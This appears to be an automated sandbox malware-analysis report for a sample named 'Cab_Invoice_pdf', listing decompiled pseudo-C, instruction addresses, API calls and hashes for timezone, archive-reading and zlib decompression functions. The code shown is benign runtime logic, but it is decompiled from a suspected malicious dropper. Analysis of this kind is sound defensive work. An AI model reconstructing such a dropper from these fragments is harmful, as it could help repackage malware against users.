										_t29 = _t124 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										goto L44;
									} else {
										_push(3);
										_t28 = _t124 + 4; // 0xfffffddd
										_t127 = E013250A9(_t162,  *_t28, 0x40, _t179);
										_t197 = _t197 + 0x10;
										__eflags = _t127;
										if(_t127 == 0) {
											L44:
											 *(E0132ABF6()) = _v8;
											_t115 = E0132ABEA();
											 *_t115 = _v16;
											goto L45;
										} else {
											goto L46;
										}
									}
								}
							}
						}
					} else {
						_t167 = _t170;
						_t133 = _t179;
						while(1) {
							_t141 =  *_t133;
							if(_t141 !=  *_t167) {
								break;
							}
							if(_t141 == 0) {
								L8:
								_t115 = 0;
							} else {
								_t9 = _t133 + 1; // 0xdde805eb
								_t142 =  *_t9;
								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
									break;
								} else {
									_t133 = _t133 + 2;
									_t167 = _t167 + 2;
									if(_t142 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t115 == 0) {
								L45:
								return _t115;
							} else {
								_t135 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t115 = _t133 | 0x00000001;
						__eflags = _t115;
						goto L10;
					}
				}
				L82:
			}







































































                            0x0132afc7
                            0x0132afc8
                            0x0132afcd
                            0x0132afd1
                            0x0132afd3
                            0x0132afdb
                            0x0132afe6
                            0x0132b186
                            0x0132b188
                            0x0132b189
                            0x0132b18a
                            0x0132b18b
                            0x0132b18c
                            0x0132b18d
                            0x0132b192
                            0x0132b196
                            0x0132b198
                            0x0132b19b
                            0x0132b1a2
                            0x0132b1a9
                            0x0132b1ad
                            0x0132b1b0
                            0x0132b1b3
                            0x0132b1b8
                            0x0132b1b9
                            0x0132b1bb
                            0x0132b2e3
                            0x0132b2e3
                            0x0132b2e4
                            0x0132b2e5
                            0x0132b2e6
                            0x0132b2e7
                            0x0132b2e8
                            0x0132b2ed
                            0x0132b2f0
                            0x0132b2f1
                            0x0132b2f9
                            0x0132b300
                            0x0132b303
                            0x0132b310
                            0x0132b317
                            0x0132b318
                            0x0132b319
                            0x0132b31a
                            0x0132b31f
                            0x0132b32e
                            0x0132b335
                            0x0132b33d
                            0x0132b33f
                            0x0132b349
                            0x0132b34c
                            0x0132b359
                            0x0132b35c
                            0x0132b35e
                            0x0132b377
                            0x0132b37f
                            0x0132b381
                            0x0132b387
                            0x0132b38c
                            0x0132b383
                            0x0132b383
                            0x00000000
                            0x0132b383
                            0x0132b360
                            0x0132b360
                            0x0132b361
                            0x0132b361
                            0x0132b361
                            0x0132b38e
                            0x0132b341
                            0x0132b341
                            0x0132b341
                            0x0132b39b
                            0x0132b39d
                            0x0132b39f
                            0x0132b3a1
                            0x0132b3b1
                            0x0132b3b1
                            0x0132b3a3
                            0x0132b3a3
                            0x0132b3a6
                            0x00000000
                            0x0132b3a8
                            0x0132b3a8
                            0x0132b3a9
                            0x0132b3ae
                            0x0132b3a6
                            0x0132b3b7
                            0x0132b3c2
                            0x0132b3c5
                            0x0132b3cd
                            0x0132b1c1
                            0x0132b1c5
                            0x0132b1ca
                            0x0132b1cb
                            0x0132b1cd
                            0x00000000
                            0x0132b1d3
                            0x0132b1d7
                            0x0132b1dc
                            0x0132b1dd
                            0x0132b1df
                            0x00000000
                            0x0132b1e5
                            0x0132b1eb
                            0x0132b1f0
                            0x0132b1f6
                            0x0132b1fd
                            0x0132b203
                            0x0132b206
                            0x0132b20c
                            0x0132b213
                            0x0132b219
                            0x0132b21d
                            0x0132b223
                            0x0132b226
                            0x0132b22d
                            0x0132b232
                            0x0132b232
                            0x0132b234
                            0x0132b234
                            0x0132b237
                            0x0132b23e
                            0x0132b256
                            0x0132b256
                            0x0132b259
                            0x0132b240
                            0x0132b240
                            0x0132b245
                            0x0132b247
                            0x00000000
                            0x0132b249
                            0x0132b24b
                            0x0132b251
                            0x0132b251
                            0x0132b247
                            0x0132b261
                            0x0132b275
                            0x0132b27b
                            0x0132b27d
                            0x0132b28b
                            0x0132b28d
                            0x0132b27f
                            0x0132b27f
                            0x0132b282
                            0x00000000
                            0x0132b284
                            0x0132b286
                            0x0132b286
                            0x0132b282
                            0x0132b2a2
                            0x0132b2a9
                            0x0132b2ab
                            0x0132b2ba
                            0x0132b2bd
                            0x0132b2ad
                            0x0132b2ad
                            0x0132b2b0
                            0x00000000
                            0x0132b2b2
                            0x0132b2b5
                            0x0132b2b5
                            0x0132b2b0
                            0x0132b2ab
                            0x0132b2c7
                            0x0132b2d1
                            0x0132b2d6
                            0x0132b2db
                            0x0132b2e2
                            0x0132b2e2
                            0x0132b1df
                            0x0132b1cd
                            0x0132affe
                            0x0132affe
                            0x0132b004
                            0x0132b009
                            0x0132b03f
                            0x0132b040
                            0x0132b046
                            0x0132b048
                            0x0132b048
                            0x0132b04b
                            0x0132b04b
                            0x0132b04d
                            0x0132b04e
                            0x0132b054
                            0x0132b05f
                            0x0132b064
                            0x0132b069
                            0x0132b073
                            0x00000000
                            0x0132b079
                            0x0132b079
                            0x0132b07b
                            0x0132b07c
                            0x0132b07c
                            0x0132b07f
                            0x0132b07f
                            0x0132b081
                            0x0132b082
                            0x0132b089
                            0x0132b08e
                            0x0132b093
                            0x0132b098
                            0x00000000
                            0x0132b09e
                            0x0132b0a0
                            0x0132b0a1
                            0x0132b0a7
                            0x0132b0ac
                            0x0132b0b1
                            0x00000000
                            0x0132b0b7
                            0x0132b0b7
                            0x0132b0bc
                            0x0132b0bd
                            0x0132b0c0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132b0c0
                            0x0132b0c5
                            0x0132b0c6
                            0x0132b0cb
                            0x0132b0cd
                            0x0132b0cd
                            0x0132b0d5
                            0x0132b0db
                            0x0132b0de
                            0x0132b0de
                            0x0132b0e2
                            0x00000000
                            0x00000000
                            0x0132b0ec
                            0x0132b0ec
                            0x0132b0ef
                            0x0132b0f2
                            0x0132b0f4
                            0x0132b102
                            0x0132b104
                            0x0132b10e
                            0x0132b10e
                            0x0132b110
                            0x0132b112
                            0x00000000
                            0x00000000
                            0x0132b109
                            0x0132b10b
                            0x0132b10d
                            0x0132b10d
                            0x00000000
                            0x0132b10d
                            0x00000000
                            0x0132b10b
                            0x0132b114
                            0x0132b117
                            0x0132b119
                            0x0132b124
                            0x0132b126
                            0x0132b130
                            0x0132b130
                            0x0132b132
                            0x0132b134
                            0x00000000
                            0x00000000
                            0x0132b12b
                            0x0132b12d
                            0x0132b12f
                            0x0132b12f
                            0x00000000
                            0x0132b12f
                            0x00000000
                            0x0132b12d
                            0x0132b130
                            0x0132b117
                            0x0132b136
                            0x0132b136
                            0x0132b138
                            0x0132b13c
                            0x0132b13c
                            0x0132b141
                            0x0132b143
                            0x0132b146
                            0x0132b149
                            0x0132b14b
                            0x0132b14e
                            0x0132b166
                            0x0132b169
                            0x00000000
                            0x0132b150
                            0x0132b150
                            0x0132b155
                            0x0132b158
                            0x0132b15d
                            0x0132b160
                            0x0132b162
                            0x0132b16c
                            0x0132b174
                            0x0132b179
                            0x0132b17e
                            0x00000000
                            0x0132b164
                            0x00000000
                            0x0132b164
                            0x0132b162
                            0x0132b14e
                            0x0132b0b1
                            0x0132b098
                            0x0132b00b
                            0x0132b00b
                            0x0132b00d
                            0x0132b00f
                            0x0132b00f
                            0x0132b013
                            0x00000000
                            0x00000000
                            0x0132b017
                            0x0132b02b
                            0x0132b02b
                            0x0132b019
                            0x0132b019
                            0x0132b019
                            0x0132b01f
                            0x00000000
                            0x0132b021
                            0x0132b021
                            0x0132b024
                            0x0132b029
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132b029
                            0x0132b01f
                            0x0132b034
                            0x0132b036
                            0x0132b180
                            0x0132b185
                            0x0132b03c
                            0x0132b03c
                            0x00000000
                            0x0132b03c
                            0x00000000
                            0x0132b036
                            0x0132b02f
                            0x0132b031
                            0x0132b031
                            0x00000000
                            0x0132b031
                            0x0132b009
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 0132B040
                            • _free.LIBCMT ref: 0132B064
                            • _free.LIBCMT ref: 0132B1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 314583886-1154798116
                            • Opcode ID: e2d1dbeffe8d3028d7ac62ea27825487dc6fc9dc4a54444adf2f57a304a91eac
                            • Instruction ID: ad1e6ccfdb1e434a41802fe5c3c720eb15ba9e5c4ffc7f115376f5ba56a64db3
                            • Opcode Fuzzy Hash: e2d1dbeffe8d3028d7ac62ea27825487dc6fc9dc4a54444adf2f57a304a91eac
                            • Instruction Fuzzy Hash: 2AC15A71D00325AFDB25FF7C8841AAEFBBCEF46358F14419AD99097249EB309A41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311220, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 55%
                            			E01311220(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t10;
				void* _t12;
				void* _t14;
				intOrPtr _t15;
				intOrPtr _t32;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t49;
				void* _t51;
				void* _t52;

				_t38 = __edx;
				_t37 = __ecx;
				_t39 =  *((intOrPtr*)(_t49 + 8));
				if( *_t39 != 0) {
					L3:
					_t44 =  *((intOrPtr*)(_t49 + 0x14));
					_push(0);
					L01317864();
					_t12 = E01319F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
					_push( *((intOrPtr*)(_t44 + 8)));
					L01317864();
					_push(_t12);
					_t32 = E01319808(_t37);
					_t51 = _t49 + 0x10;
					__eflags = _t32;
					if(__eflags != 0) {
						_push( *_t39);
						L01317864();
						_t14 = E01319B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
						_t52 = _t51 + 0x10;
						__eflags = _t14 - 1;
						if(__eflags >= 0) {
							__eflags =  *((char*)(_t44 + 0x10)) - 1;
							if(__eflags != 0) {
								L10:
								_t15 =  *_t39;
								__eflags = _t15;
								if(__eflags != 0) {
									_push(_t15); // executed
									E01319889(_t37, _t38, __eflags); // executed
									 *_t39 = 0;
								}
								return _t32;
							} else {
								_push(_t44);
								_t41 = E01311030(_t14, _t32, _t37, __eflags, _t32);
								L01319803(_t32);
								_t52 = _t52 + 0xc;
								_t32 = _t41;
								__eflags = _t41;
								if(__eflags != 0) {
									goto L10;
								} else {
									E01311980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							_push("Could not read from file\n");
							E01311980(__eflags);
							L01319803(_t32);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Could not allocate read buffer\n");
						E01311980(__eflags);
						__eflags = 0;
						return 0;
					}
				} else {
					_t10 = E013128C0(_t39 + 0x68, "rb");
					_t49 = _t49 + 8;
					 *_t39 = _t10;
					_t59 = _t10;
					if(_t10 != 0) {
						goto L3;
					} else {
						_push("Cannot open archive file\n");
						E01311980(_t59);
						return 0;
					}
				}
			}


















                            0x01311220
                            0x01311220
                            0x01311221
                            0x01311228
                            0x01311252
                            0x01311254
                            0x01311258
                            0x0131125d
                            0x01311268
                            0x01311270
                            0x01311273
                            0x01311278
                            0x0131127e
                            0x01311280
                            0x01311283
                            0x01311285
                            0x0131129a
                            0x013112a1
                            0x013112a8
                            0x013112ad
                            0x013112b0
                            0x013112b3
                            0x013112ce
                            0x013112d2
                            0x01311305
                            0x01311305
                            0x01311307
                            0x01311309
                            0x0131130b
                            0x0131130c
                            0x01311314
                            0x01311314
                            0x0131131f
                            0x013112d4
                            0x013112d5
                            0x013112dd
                            0x013112df
                            0x013112e4
                            0x013112e7
                            0x013112e9
                            0x013112ec
                            0x00000000
                            0x013112ee
                            0x013112f7
                            0x013112ff
                            0x01311304
                            0x01311304
                            0x013112ec
                            0x013112b5
                            0x013112b5
                            0x013112ba
                            0x013112c0
                            0x013112c8
                            0x013112cd
                            0x013112cd
                            0x01311287
                            0x01311287
                            0x0131128c
                            0x01311294
                            0x01311299
                            0x01311299
                            0x0131122a
                            0x01311233
                            0x01311238
                            0x0131123b
                            0x0131123d
                            0x0131123f
                            0x00000000
                            0x01311241
                            0x01311241
                            0x01311246
                            0x01311251
                            0x01311251
                            0x0131123f

                            APIs
                            Strings
                            • Cannot open archive file, xrefs: 01311241
                            • Could not read from file, xrefs: 013112B5
                            • Error decompressing %s, xrefs: 013112F2
                            • Could not allocate read buffer, xrefs: 01311287
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: 39eb761703b1aeb2ec57b5b08f5400743214b8df73a308d97527a5a268ddcd11
                            • Instruction ID: f77e0b07d89179bdd72eeec44cccbfde91d9a02c9d2a01d116a45d443ecc958d
                            • Opcode Fuzzy Hash: 39eb761703b1aeb2ec57b5b08f5400743214b8df73a308d97527a5a268ddcd11
                            • Instruction Fuzzy Hash: 9521D8F2A003067AEB187A7DBC41BDEBB89AF6115DF540531FE04D120EF762D56083A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132B193, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 473 132b193-132b1bb call 132abfc call 132ac5a 478 132b2e3-132b33f call 1321798 call 1326cc0 473->478 479 132b1c1-132b1cd call 132ac02 473->479 490 132b341-132b347 478->490 491 132b349-132b34c 478->491 479->478 484 132b1d3-132b1df call 132ac2e 479->484 484->478 492 132b1e5-132b206 call 13209eb GetTimeZoneInformation 484->492 493 132b38f-132b3a1 490->493 491->493 495 132b34e-132b35e call 1320a25 491->495 501 132b2bf-132b2e2 call 132abf6 call 132abea call 132abf0 492->501 502 132b20c-132b22d 492->502 496 132b3a3-132b3a6 493->496 497 132b3b1 call 132b193 493->497 510 132b360 495->510 511 132b368-132b381 call 1326cc0 495->511 496->497 500 132b3a8-132b3af call 132afbe 496->500 509 132b3b6-132b3cd call 13209eb call 131786a 497->509 500->509 507 132b237-132b23e 502->507 508 132b22f-132b234 502->508 516 132b240-132b247 507->516 517 132b256-132b259 507->517 508->507 512 132b361-132b366 call 13209eb 510->512 526 132b383-132b384 511->526 527 132b386-132b38c call 13209eb 511->527 531 132b38e 512->531 516->517 522 132b249-132b254 516->522 524 132b25c-132b27d call 1327d59 WideCharToMultiByte 517->524 522->524 538 132b28b-132b28d 524->538 539 132b27f-132b282 524->539 526->512 527->531 531->493 541 132b28f-132b2ab WideCharToMultiByte 538->541 539->538 540 132b284-132b289 539->540 540->541 542 132b2ba-132b2bd 541->542 543 132b2ad-132b2b0 541->543 542->501 543->542 544 132b2b2-132b2b8 543->544 544->501
                            C-Code - Quality: 73%
                            			E0132B193(void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				void* _t45;
				signed int _t49;
				void* _t53;
				void* _t55;
				long _t57;
				signed int* _t60;
				intOrPtr _t70;
				void* _t79;
				signed int _t86;
				void* _t88;
				signed int _t89;
				signed int _t91;
				int _t95;
				void* _t97;
				char** _t98;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				intOrPtr _t120;
				intOrPtr _t122;

				_t98 = E0132ABFC();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E0132AC5A( &_v8);
				_t79 = _t97;
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01321798();
					asm("int3");
					_t110 = _t111;
					_t38 =  *0x133c008; // 0xa212446c
					_v56 = _t38 ^ _t110;
					 *0x133c91c =  *0x133c91c | 0xffffffff;
					 *0x133c910 =  *0x133c910 | 0xffffffff;
					_push(0);
					_push(_t98);
					_t76 = "TZ";
					_t91 = 0;
					 *0x1346578 = 0;
					_t42 = E01326CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ"); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t104 = E01320A25(_t79, _v272);
							__eflags = _t104;
							if(__eflags != 0) {
								_t49 = E01326CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
								__eflags = _t49;
								if(_t49 == 0) {
									E013209EB(0);
									_t91 = _t104;
								} else {
									_push(_t104);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E013209EB();
							}
						}
					} else {
						_t91 =  &_v268;
					}
					asm("sbb esi, esi");
					_t102 =  ~(_t91 -  &_v268) & _t91;
					__eflags = _t91;
					if(__eflags == 0) {
						L33:
						E0132B193(__eflags); // executed
					} else {
						__eflags =  *_t91;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t91);
							E0132AFBE(__eflags);
						}
					}
					_t45 = E013209EB(_t102);
					__eflags = _v12 ^ _t110;
					E0131786A();
					return _t45;
				} else {
					_t53 = E0132AC02( &_v12);
					_pop(_t79);
					if(_t53 != 0) {
						goto L19;
					} else {
						_t55 = E0132AC2E( &_v16);
						_pop(_t79);
						if(_t55 != 0) {
							goto L19;
						} else {
							E013209EB( *0x1346574);
							 *0x1346574 = 0;
							 *_t111 = 0x1346580; // executed
							_t57 = GetTimeZoneInformation(??); // executed
							if(_t57 != 0xffffffff) {
								_t86 =  *0x1346580 * 0x3c;
								_t89 =  *0x13465d4; // 0x0
								_push(_t90);
								 *0x1346578 = 1;
								_v8 = _t86;
								_t120 =  *0x13465c6; // 0xb
								if(_t120 != 0) {
									_v8 = _t86 + _t89 * 0x3c;
								}
								_t122 =  *0x134661a; // 0x3
								if(_t122 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t70 =  *0x1346628; // 0xffffffc4
									if(_t70 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t70 - _t89) * 0x3c;
									}
								}
								_t95 = E01327D59(0, _t89);
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t98) = 0;
								} else {
									( *_t98)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t98[1]) = 0;
								} else {
									_t98[1][0x3f] = 0;
								}
							}
							 *(E0132ABF6()) = _v8;
							 *(E0132ABEA()) = _v12;
							_t60 = E0132ABF0();
							 *_t60 = _v16;
							return _t60;
						}
					}
				}
			}









































                            0x0132b1a2
                            0x0132b1a9
                            0x0132b1ad
                            0x0132b1b0
                            0x0132b1b3
                            0x0132b1b8
                            0x0132b1bb
                            0x0132b2e3
                            0x0132b2e3
                            0x0132b2e4
                            0x0132b2e5
                            0x0132b2e6
                            0x0132b2e7
                            0x0132b2e8
                            0x0132b2ed
                            0x0132b2f1
                            0x0132b2f9
                            0x0132b300
                            0x0132b303
                            0x0132b310
                            0x0132b317
                            0x0132b318
                            0x0132b31a
                            0x0132b31f
                            0x0132b32e
                            0x0132b335
                            0x0132b33d
                            0x0132b33f
                            0x0132b349
                            0x0132b34c
                            0x0132b359
                            0x0132b35c
                            0x0132b35e
                            0x0132b377
                            0x0132b37f
                            0x0132b381
                            0x0132b387
                            0x0132b38c
                            0x0132b383
                            0x0132b383
                            0x00000000
                            0x0132b383
                            0x0132b360
                            0x0132b360
                            0x0132b361
                            0x0132b361
                            0x0132b361
                            0x0132b38e
                            0x0132b341
                            0x0132b341
                            0x0132b341
                            0x0132b39b
                            0x0132b39d
                            0x0132b39f
                            0x0132b3a1
                            0x0132b3b1
                            0x0132b3b1
                            0x0132b3a3
                            0x0132b3a3
                            0x0132b3a6
                            0x00000000
                            0x0132b3a8
                            0x0132b3a8
                            0x0132b3a9
                            0x0132b3ae
                            0x0132b3a6
                            0x0132b3b7
                            0x0132b3c2
                            0x0132b3c5
                            0x0132b3cd
                            0x0132b1c1
                            0x0132b1c5
                            0x0132b1ca
                            0x0132b1cd
                            0x00000000
                            0x0132b1d3
                            0x0132b1d7
                            0x0132b1dc
                            0x0132b1df
                            0x00000000
                            0x0132b1e5
                            0x0132b1eb
                            0x0132b1f0
                            0x0132b1f6
                            0x0132b1fd
                            0x0132b206
                            0x0132b20c
                            0x0132b213
                            0x0132b219
                            0x0132b21d
                            0x0132b223
                            0x0132b226
                            0x0132b22d
                            0x0132b234
                            0x0132b234
                            0x0132b237
                            0x0132b23e
                            0x0132b256
                            0x0132b256
                            0x0132b259
                            0x0132b240
                            0x0132b240
                            0x0132b247
                            0x00000000
                            0x0132b249
                            0x0132b24b
                            0x0132b251
                            0x0132b251
                            0x0132b247
                            0x0132b261
                            0x0132b27d
                            0x0132b28d
                            0x0132b284
                            0x0132b286
                            0x0132b286
                            0x0132b2ab
                            0x0132b2bd
                            0x0132b2b2
                            0x0132b2b5
                            0x0132b2b5
                            0x0132b2ab
                            0x0132b2c7
                            0x0132b2d1
                            0x0132b2d6
                            0x0132b2db
                            0x0132b2e2
                            0x0132b2e2
                            0x0132b1df
                            0x0132b1cd

                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 0132B3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            • Opcode ID: b231e4c7a19b8d13a6d32f4cf16cc9f7fee0db9e8fafad810bbf7762a87ab6bc
                            • Instruction ID: 61c5e3984a63fa54aa86512a1a33a2db4d23e01a647ed48bdde910497867aebe
                            • Opcode Fuzzy Hash: b231e4c7a19b8d13a6d32f4cf16cc9f7fee0db9e8fafad810bbf7762a87ab6bc
                            • Instruction Fuzzy Hash: 4451EAB1900329DBDB24FF6D9D4196EFBBCEF46358F10426AE514D3148EB309A40CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311030, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311030(void* __eax, void* __ebx, void* __ecx, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr _t37;

				_t36 = _a8;
				_push( *((intOrPtr*)(_t36 + 0xc)));
				L01317864();
				_t19 = E01319808(__ecx); // executed
				_t37 = _t19;
				_t47 = _t37;
				if(_t37 != 0) {
					_t20 = _v0;
					_push( *((intOrPtr*)(_t36 + 8)));
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v60 = _t20;
					L01317864();
					_push( *((intOrPtr*)(_t36 + 0xc)));
					_v60 = _t20;
					_v52 = _t37;
					L01317864();
					_v52 = _t20;
					__eflags = E01316720( &_v68, "1.2.11", 0x38);
					if(__eflags < 0) {
						_push(_v44);
						E01311980(__eflags, "Error %d from inflateInit: %s\n", _t22);
						__eflags = 0;
						return 0;
					} else {
						_push(4);
						_push( &_v68);
						__eflags = E01314E60();
						if(__eflags < 0) {
							_push(_v44);
							E01311980(__eflags, "Error %d from inflate: %s\n", _t26);
							__eflags = 0;
							return 0;
						} else {
							E013165F0(__ebx,  &_v68);
							return _t37;
						}
					}
				} else {
					_push("Error allocating decompression buffer\n");
					E01311980(_t47);
					return 0;
				}
			}















                            0x01311035
                            0x01311039
                            0x0131103c
                            0x01311042
                            0x01311047
                            0x0131104c
                            0x0131104e
                            0x01311065
                            0x01311069
                            0x0131106c
                            0x01311074
                            0x0131107c
                            0x01311084
                            0x01311088
                            0x0131108d
                            0x01311090
                            0x01311094
                            0x01311098
                            0x0131109f
                            0x013110b5
                            0x013110b7
                            0x013110fb
                            0x01311105
                            0x0131110d
                            0x01311114
                            0x013110b9
                            0x013110bd
                            0x013110bf
                            0x013110c8
                            0x013110ca
                            0x013110e1
                            0x013110eb
                            0x013110f3
                            0x013110fa
                            0x013110cc
                            0x013110d1
                            0x013110e0
                            0x013110e0
                            0x013110ca
                            0x01311050
                            0x01311050
                            0x01311055
                            0x01311064
                            0x01311064

                            APIs
                            Strings
                            • 1.2.11, xrefs: 013110A7
                            • Error %d from inflateInit: %s, xrefs: 01311100
                            • Error %d from inflate: %s, xrefs: 013110E6
                            • Error allocating decompression buffer, xrefs: 01311050
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            • Opcode ID: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction ID: 71e37c7775126a26b8dd9b2ce0d29a2fa0c4e1388e7e2a95d02720c2a2802712
